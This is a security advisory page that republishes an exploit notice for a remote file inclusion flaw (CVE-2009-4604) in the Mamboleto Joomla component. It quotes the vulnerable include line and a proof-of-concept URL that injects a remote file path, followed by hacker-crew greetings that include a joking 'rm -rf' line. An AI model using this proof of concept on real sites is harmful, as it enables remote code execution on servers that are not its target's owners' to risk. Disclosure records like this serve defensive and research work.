|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 6936 CVE : CVE-2009-4604 CWE : CWE-98 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : Don Tukulesto Published : 13.01.2010
Advisory Content : /************************************************************************** [!] Mamboleto Joomla! component Remote File Include Vulneralbility [!] Author : Don Tukulesto (root@indonesiancoder.com) [!] Homepage : http://www.indonesiancoder.com [!] Date : December 10, 2009 [!] Tune In : http://antisecradio.fm (choose your weapon) **************************************************************************/ [ Software Information ] [+] Vendor : http://www.fernandosoares.com.br/ [+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_downl oad&gid=35&Itemid=28 [+] Version() : 2.0 RC3 [+] Novo Mamboleto 2.0 RC3 para Joomla! 1.5.x em "legacy mode". Muito mais aprimorado com dois bancos a mais (Sicredi e Bancoob) e com um novo módulo de integração com o VirtueMart. [+] Method : Remote File Inclusion [+] Dork : Wie WiLL Not Go Down =========================================================================== [ Vulnerable File ] [+] mamboleto.php Line 123 include_once( $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php'); [ Proof of Concept ] http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute _path=[INDONESIANCODER-666] =========================================================================== [ Who The Hell Has Control of That Damn Smoke Machine ] [~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown [~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd, [~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz [~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!! [~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends [ rm -rf yourself ] [>] FOR MALINGSIAL [ some quotes ] [+] Jack- says : why so serious ? [+] Yadoy666 says : awas ada tukang =)) [+] arianom says : Kumpulkan Koin untuk Prita Mulyasari !!! [+] Pathloader says : Oke lah kalau beg... beg... beg... begitu :D [+] tiw0L says : Ojo di maem pleaseeeeee!!! [+] kaMtiEz says : aku bukan HOMO <++++ Fitnah nih ga mau ngakuin :p References : http://xforce.iss.net/xforce/xfdb/54662
http://www.securityfocus.com/bid/37280
http://www.exploit-db.com/exploits/10369
http://packetstormsecurity.org/0912-exploits/joomlamamboleto-rfi.txt  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |